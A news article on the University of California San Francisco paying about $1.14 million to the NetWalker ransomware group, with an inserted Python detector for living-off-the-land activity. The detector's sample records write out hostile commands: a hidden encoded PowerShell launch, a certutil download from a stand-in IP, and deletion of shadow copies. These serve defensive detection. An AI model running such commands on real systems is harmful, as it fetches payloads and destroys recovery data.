
Attacks/Breaches

6/29/2020
05:30 PM

University of California SF Pays Ransom After Medical Servers Hit

As one of at least three universities hit in June, the school paid $1.14 million to cybercriminals following an attack on "several IT systems" in the UCSF School of Medicine.

The University of California San Francisco paid about $1.14 million to ransomware operators earlier this month after the attackers' malware compromised several important servers in the UCSF School of Medicine and encrypted their data to prevent access, UCSF administrators stated on June 26.

The crypto-ransomware attacks, which have been attributed to the NetWalker group, also reportedly hit Michigan State University and Columbia College of Chicago. UCSF, which has pursued a substantial amount of research on coronavirus and COVID-19, stated that the attacks had not affected that research, nor had an impact on the operations of its medical center and patient care.

However, the ransomware had affected "a limited number of servers" in the medical school, the university said in a statement.

"The data that was encrypted is important to some of the academic work we pursue as a university serving the public good," the statement said. "We therefore made the difficult decision to pay some portion of the ransom, approximately $1.14 million, to the individuals behind the malware attack in exchange for a tool to unlock the encrypted data and the return of the data they obtained."

UCSF's information technology department caught the attack in progress and "quarantined several IT systems within the School of Medicine as a safety measure," preventing the attack from reaching the "core UCSF network," the university said in the June 26 statement.

The attack and its million-dollar consequences show that organizations must be able to recognize attacks and stop them much more quickly, says Marcus Fowler, director of strategic threat at Darktrace, a threat protection firm.

"I think with ransomware, speed and visibility is going to be the key," he says. "They are running around and unplugging machines to manage the bleeding, rather than focusing on what happened."

NetWalker started attacking organizations in 2019, focusing on large, global entities, according to cybersecurity firm SentinelOne. The group uses many generic system tools and tends to favor so-called "living off the land" tactics, in which the attackers rely as far as possible on utilities already present on the victim's systems instead of installing their own tools, reducing the chance that endpoint defenses flag a new malicious binary, Jim Walter, a senior threat researcher at SentinelOne, wrote in a blog post on the group.
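Because living-off-the-land activity uses legitimate, signed system binaries, it is usually caught by looking at how those utilities are invoked and by whom, not by hunting for a dropped malware file. The following is an added example, not code from the article, from SentinelOne's post, or from any NetWalker analysis: a small Python detector that applies a few generic parent/command-line rules to constructed Sysmon-style process-creation records. The rule set and the sample records are illustrations of the technique in general; nothing here is an indicator this article attributes to NetWalker.

```python
import re

# Constructed Sysmon-style process-creation records (parent image, child image, command
# line), written for this example; they are not log data from the UCSF incident or any
# real host. Indices matter: the rules below fire on records 1, 2 and 3 only.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": r"notepad.exe C:\Users\alice\notes.txt"},
    {"parent": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -NoP -W Hidden -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -urlcache -split -f http://203.0.113.5/p.bin C:\Users\Public\p.bin"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\vssadmin.exe",
     "cmdline": "vssadmin.exe delete shadows /all /quiet"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\certutil.exe",
     "cmdline": r"certutil.exe -hashfile C:\tools\setup.msi SHA256"},
]


def _basename(path):
    """Lower-cased file name of a Windows path, e.g. 'powershell.exe'."""
    return path.rsplit("\\", 1)[-1].lower()


# Each rule: (name, regex on child basename, regex on parent basename or None,
# regex on the full command line or None). Every non-None part must match.
RULES = [
    # An Office application spawning PowerShell is the classic malicious-document pattern
    # (the article describes NetWalker luring victims with PDF documents; the parent list
    # here is a generic assumption, not taken from the article).
    ("office_spawned_powershell", r"^powershell\.exe$",
     r"^(winword|excel|powerpnt|outlook)\.exe$", None),
    # Base64-encoded commands or a hidden window have few legitimate interactive uses.
    ("powershell_encoded_or_hidden", r"^powershell\.exe$", None,
     r"(?i)(?:\s-(?:e|ec|enc|encodedcommand)\s+\S+|\s-w(?:indowstyle)?\s+hidden)"),
    # certutil pulling a URL is a well-known way to download without bringing a tool.
    ("certutil_download", r"^certutil\.exe$", None, r"(?i)-urlcache|https?://"),
    # Deleting Volume Shadow Copies removes the local rollback point before encryption;
    # a common ransomware preparation step in general, not one this article attributes
    # to NetWalker.
    ("shadow_copy_deletion", r"^vssadmin\.exe$", None, r"(?i)delete\s+shadows"),
]


def analyze_events(events):
    """Return a list of (event_index, rule_name) for every rule that fires on every event.

    One event can trigger several rules; the benign certutil -hashfile record and the
    notepad record produce nothing, which is the point of keying on arguments and parent
    rather than on the binary name alone.
    """
    hits = []
    for idx, ev in enumerate(events):
        child, parent = _basename(ev["image"]), _basename(ev["parent"])
        for name, child_re, parent_re, cmd_re in RULES:
            if not re.search(child_re, child):
                continue
            if parent_re and not re.search(parent_re, parent):
                continue
            if cmd_re and not re.search(cmd_re, ev["cmdline"]):
                continue
            hits.append((idx, name))
    return hits


if __name__ == "__main__":
    for idx, name in analyze_events(SAMPLE_EVENTS):
        print(f"event {idx}: {name}: {SAMPLE_EVENTS[idx]['cmdline']}")
```

The useful property is in the two certutil records: the same binary appears in both, and only the invocation with `-urlcache` and a URL is flagged. In production the same rules would run over real Sysmon Event ID 1 or EDR telemetry, and the parent-process rule would be extended to whatever document handlers the environment actually uses.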

In February, the group attacked the Toll Group, an Australian shipping and logistics firm, causing disruptions to the company's operations and customers, according to media reports. In March 2020, the NetWalker group infected multiple hospitals in Spain, luring victims into opening malicious PDF documents that promised updated information on COVID-19. The latter incident, along with the attack on UCSF, highlights that cybercriminal groups — which had pledged to refrain from attacking hospitals and medical-research facilities during the coronavirus pandemic — cannot be trusted to forgo profits.

NetWalker, in particular, appears to be attacking with abandon — and leaking data, if the organization does not pay, Walter says.

"Consequently, detection and clean-up is no longer sufficient to ensure organizational data remains confidential and secure," he wrote in the blog post. "Prevention is the only cure for threats like NetWalker, which hit organizations with the double-edged sword of encryption by ransomware and extortion via threats of public data exposure."

BBC News managed to get a fly-on-the-wall view of the negotiation between UCSF and the NetWalker criminal group, which opened with a demand of $3 million. After some back and forth, the two parties settled on 116.4 bitcoins, about $1.14 million at the time, which the school paid.

The school notified the FBI and is cooperating with its investigation. The university does not believe that any sensitive medical information was exposed by the attack.

"Our investigation is ongoing but, at this time, we believe that the malware encrypted our servers opportunistically, with no particular area being targeted," UCSF stated in its statement. "The attackers obtained some data as proof of their action, to use in their demand for a ransom payment."

The school declined to offer additional details, citing the ongoing federal investigation.

"In order to preserve the integrity of the investigation, we are limited in what we can share at this time and appreciate everyone's patience as we resolve this situation," UCSF said in its June 17 statement.

Veteran technology journalist of more than 20 years. Former research engineer. Written for more than two dozen publications, including CNET News.com, Dark Reading, MIT's Technology Review, Popular Science, and Wired News. Five awards for journalism, including Best Deadline ...
Comments
RyanSepe, User Rank: Ninja, 6/30/2020 | 11:01:20 PM
Facepalm
How many healthcare shops need to be burnt by the stove before they put in an effective backup process to prevent these types of incidents? Honestly, at this point it's just negligence.